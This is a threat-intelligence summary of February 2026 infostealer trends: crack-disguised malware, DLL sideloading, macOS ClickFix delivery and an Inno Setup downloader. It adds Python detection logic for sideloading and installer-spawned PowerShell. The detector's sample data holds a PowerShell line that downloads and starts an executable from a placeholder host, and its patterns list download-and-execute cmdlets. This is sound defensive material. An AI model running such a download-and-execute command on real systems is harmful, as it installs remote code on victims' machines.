February 2026 Infostealer Trend Report
This report provides statistics, trends, and case information on the number of infostealer distribution cases, the distribution methods, and the disguise techniques collected and analyzed during February 2026. Below is a summary of the report's original content.
1) Data Sources and Collection Methods
AhnLab SEcurity intelligence Center (ASEC) operates several systems that automatically collect malware in circulation in order to counter infostealers proactively. Collected malware is analyzed by automated systems to confirm that it is malicious and to extract its C2 information. This information is provided in real time through the ATIP real-time IOC service and can also be found in the related information section of the ATIP file analysis page.
AhnLab's self-built systems
- Automated collection system for malware disguised as cracks
- Email honeypot system
- Malware C2 automatic analysis system
ATIP real-time IOC service
- C2 and malware type analysis information
- File Analysis Information – Related Information – Contacted URLs
The statistics in this report are intended for identifying trends in the overall number of infostealer distribution cases, disguise techniques, and distribution methods.
2) Infostealer disguised as cracks
These statistics cover information-stealing malware disguised as illegal programs such as cracks and keygens. It is distributed through SEO poisoning, a strategy that pushes the malware distribution posts to the top of search engine results. ASEC has built a system that automatically collects malware distributed in this way and analyzes its C2 information, which enables real-time blocking of the malware C2s and provides the related information through ATIP. In February, ACRStealer, LummaC2, and Vidar were the infostealers primarily distributed.

Figure 1. Malware Distribution Page
The quantity of malware distributed in this manner over the past year is shown in the following chart. The second series indicates the quantity of malware that had no record on VirusTotal at the time of collection, meaning that AhnLab collected it before it was submitted there. The majority of the malware was first collected and handled by the automated collection system.

Chart 1. Annual Malware Distribution Quantity
Previously, attackers wrote malware distribution posts directly on blogs they had created, but search engines have begun taking measures to keep these malicious blogs out of search results. To bypass this, attackers now distribute malware by writing posts on legitimate sites: popular forums, Q&A pages of specific companies, bulletin boards, comment sections, and so on. The figure below shows examples of malware distribution posts uploaded to various sites. Posts uploaded in this manner appear at the top of search engine results, so many users visit them. Recently, there has been an increase in cases where attackers target poorly managed WordPress sites to create distribution posts.

Figure 2. Distribution post posted on a website in South Korea
The infostealers distributed in this way are executed either as EXE files or through the DLL sideloading technique. In DLL sideloading, a legitimate EXE file and a malicious DLL file are placed in the same folder, so that the malicious DLL is loaded when the legitimate EXE is executed. Malware detected during February comprised approximately 74.8% EXE-type and 25.2% DLL sideloading-type, a slight decrease in the DLL sideloading share compared to the previous month. Malware using DLL sideloading is crafted by modifying only a portion of the original legitimate DLL with malicious code. Because its outward appearance differs little from the legitimate original, many security products classify it as a legitimate file, so caution is needed.
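The sideloading pattern described above leaves a characteristic trace in image-load telemetry: a signed, legitimate EXE loads a DLL from its own directory rather than from the Windows system directories, and because the DLL was patched, its signature no longer validates. The following detection logic is an added example written for this summary; it is not ASEC's code. It models Sysmon Event ID 7 (Image loaded) records, but the event records, the file paths, and the small baseline of system DLL names are constructed, and the `image_signed` field is assumed to be enriched from the matching process-creation event.

```python
"""Flag DLL loads that match the DLL sideloading pattern.

Added example (not ASEC/AhnLab code). Records mimic Sysmon Event ID 7
fields; all sample data below is constructed.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Assumption: a baseline of DLL names that should only ever load from the
# system directories. A real deployment would derive this from a golden image.
SYSTEM_DLL_NAMES = {"version.dll", "dwmapi.dll", "winmm.dll", "cryptbase.dll"}


@dataclass
class ImageLoad:
    image: str              # Sysmon "Image": the process executable
    image_loaded: str       # Sysmon "ImageLoaded": the DLL that was mapped
    signature_status: str   # Sysmon "SignatureStatus" of the DLL: Valid / Invalid / Unavailable
    image_signed: bool      # assumed enrichment from the process-create event (Event ID 1)


def _parent(path: str) -> str:
    return str(PureWindowsPath(path.lower()).parent)


def _name(path: str) -> str:
    return PureWindowsPath(path.lower()).name


def _in_system_dir(directory: str) -> bool:
    return any(directory == d or directory.startswith(d + "\\") for d in SYSTEM_DIRS)


def sideload_indicators(ev: ImageLoad) -> list[str]:
    """Return the reasons an image load looks like sideloading (empty = benign)."""
    reasons: list[str] = []
    dll_dir = _parent(ev.image_loaded)
    if _in_system_dir(dll_dir):
        return reasons  # loaded from the expected location
    # Rule A: a signed EXE pulled a DLL from its own folder and that DLL's
    # signature is missing or broken (a patched copy of a legitimate DLL).
    if dll_dir == _parent(ev.image) and ev.image_signed and ev.signature_status != "Valid":
        reasons.append("signed EXE loaded an unsigned or invalidly signed DLL from its own directory")
    # Rule B: a DLL carrying a system DLL's name loaded from a non-system path
    # (the search order preferred the attacker's copy).
    if _name(ev.image_loaded) in SYSTEM_DLL_NAMES:
        reasons.append("system DLL name loaded from a non-system directory")
    return reasons


def scan(events: list[ImageLoad]) -> list[tuple[ImageLoad, list[str]]]:
    """Run the indicators over a batch of events and keep only the hits."""
    hits = []
    for ev in events:
        reasons = sideload_indicators(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry (no real paths or files).
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Users\victim\Downloads\Setup\legit.exe",
              r"C:\Users\victim\Downloads\Setup\version.dll", "Invalid", True),
    ImageLoad(r"C:\Users\victim\Downloads\Setup\legit.exe",
              r"C:\Windows\System32\version.dll", "Valid", True),
    ImageLoad(r"C:\Program Files\Vendor\app.exe",
              r"C:\Program Files\Vendor\helper.dll", "Valid", True),
    ImageLoad(r"C:\Tools\unsigned.exe",
              r"C:\Tools\plugin.dll", "Unavailable", False),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(ev.image, "->", ev.image_loaded)
        for r in reasons:
            print("   ", r)
```

Rule A deliberately ignores unsigned EXEs loading unsigned DLLs, since many legitimate tools ship that way; the combination of a trusted EXE with an untrusted neighbouring DLL is what matches the technique the report describes.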
While the Windows infostealers described above are served to Windows environments, accessing the same distribution page from macOS triggers the distribution of macOS-specific infostealers. Distribution on macOS primarily uses the ClickFix technique, which copies malicious commands to the clipboard and prompts the user to execute them in Terminal, or lures the user into downloading and executing a malicious Bash script. The infostealers finally executed are predominantly distributed as Fatbin executables or as osascript-based implementations. Unlike the Windows distribution, they show extremely rapid sample mutation: while performing identical functions, the malware's hash values change within minutes or hours.

Figure 3. Example of a macOS Infostealer distribution page
The collection status of macOS Infostealer over the past six months is as follows. In February, 2,073 Bash scripts and 217 Fatbin executables were collected, along with 31 C2 domains.

Chart 2. macOS Infostealer collection statistics
Trend #1 – Inno Setup Downloader Malware
This type of malware first appeared in June 2024. It is a downloader packaged as an Inno Setup installer, which it abuses to deliver malicious code. Related details were introduced on the ASEC blog at the time.
Initially, a single landing page variant was used consistently for distribution, but recent campaigns employ multiple versions of the landing page. This type went largely unnoticed for some time, overshadowed by other distribution methods. Recently, however, both the distribution volume and the number of infections have surged: 5,323 pieces of malware were distributed in January and 13,211 in February.

Figure 4. Malware Distribution Landing Page
Meanwhile, as in the initial campaign, for a period of time after the malware has been downloaded, the environment that downloaded it is instead served a legitimate WinRAR installation file, as camouflage.

Figure 5. Legitimate file distribution (top), Malware distribution (bottom)
Executing the malicious code inside the downloaded compressed file displays an installer UI like the one below. Clicking the 'Next' button downloads and executes the malicious code, which in turn uses PowerShell commands to download and execute multiple additional malicious programs, including the ACRStealer infostealer. Proxyware and a Tor proxy were also confirmed, along with an installation of the legitimate Opera browser.

Figure 6. Malicious code execution screen
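The download-and-execute step described above can be caught at the process-creation boundary: PowerShell launched by an installer that is running out of a temporary extraction folder, with a command line that both fetches and starts content. The following detection logic is an added example for this summary, not ASEC's code. It assumes the Inno Setup convention of extracting the running installer into a `%TEMP%\is-XXXXX.tmp` folder; the process-creation records and command lines below are constructed, and the URL is a placeholder.

```python
"""Flag PowerShell download-and-execute chains spawned by an installer.

Added example (not ASEC/AhnLab code). Records mimic Sysmon Event ID 1
(Process Create) fields; all sample data below is constructed.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumption: Inno Setup extracts the running installer into %TEMP%\is-XXXXX.tmp\.
INNO_TMP_DIR = re.compile(r"\\temp\\is-[a-z0-9]+\.tmp\\", re.I)

# Cmdlets and .NET calls commonly used to pull content from the network.
DOWNLOAD_PATTERNS = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b)", re.I)

# Ways of running what was just downloaded.
EXEC_PATTERNS = re.compile(
    r"(invoke-expression|\biex\b|start-process|\bsaps\b|&\s*\$env:)", re.I)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcessCreate:
    image: str          # Sysmon "Image": the new process
    command_line: str   # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage": who spawned it


def classify(ev: ProcessCreate) -> list[str]:
    """Return the individual indicators present in a process-create event."""
    reasons: list[str] = []
    if PureWindowsPath(ev.image).name.lower() not in POWERSHELL_IMAGES:
        return reasons
    if INNO_TMP_DIR.search(ev.parent_image):
        reasons.append("PowerShell spawned from an Inno Setup temp extraction folder")
    if DOWNLOAD_PATTERNS.search(ev.command_line):
        reasons.append("command line downloads content from the network")
    if EXEC_PATTERNS.search(ev.command_line):
        reasons.append("command line launches the downloaded content")
    return reasons


def is_installer_downloader_chain(ev: ProcessCreate) -> bool:
    """Alert only when the installer parent is combined with a download.

    A bare installer-spawned PowerShell (e.g. a post-install script) or a
    bare download in an interactive shell is too common to alert on alone.
    """
    reasons = classify(ev)
    return (len(reasons) >= 2
            and any("Inno Setup" in r for r in reasons)
            and any("downloads" in r for r in reasons))


def scan(events: list[ProcessCreate]) -> list[ProcessCreate]:
    return [ev for ev in events if is_installer_downloader_chain(ev)]


# Constructed sample telemetry; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    ProcessCreate(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -c "iwr http://example.invalid/a.exe -OutFile '
        '$env:TEMP\\a.exe; Start-Process $env:TEMP\\a.exe"',
        r"C:\Users\victim\AppData\Local\Temp\is-AB12C.tmp\Setup.tmp"),
    ProcessCreate(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -c Get-ChildItem C:\\",
        r"C:\Windows\explorer.exe"),
    ProcessCreate(
        r"C:\Windows\System32\cmd.exe",
        "cmd /c dir",
        r"C:\Users\victim\AppData\Local\Temp\is-AB12C.tmp\Setup.tmp"),
    ProcessCreate(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -c Get-Process",
        r"C:\Users\victim\AppData\Local\Temp\is-ZZ99Q.tmp\Setup.tmp"),
]

if __name__ == "__main__":
    for ev in scan(SAMPLE_EVENTS):
        print("ALERT:", ev.parent_image, "->", ev.command_line)
        for r in classify(ev):
            print("   ", r)
```

The regexes are intentionally broad and would be tuned against an organisation's own baseline; the point is the combination of installer parent, download verb and launch verb, which is exactly the chain the report attributes to this downloader.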
Detailed information not covered in this summary, including statistics on the disguised target companies used in malware creation, original filename statistics, distribution source statistics, product detection volume statistics, and phishing email-related information concerning the infostealer, can be found in the original ATIP report.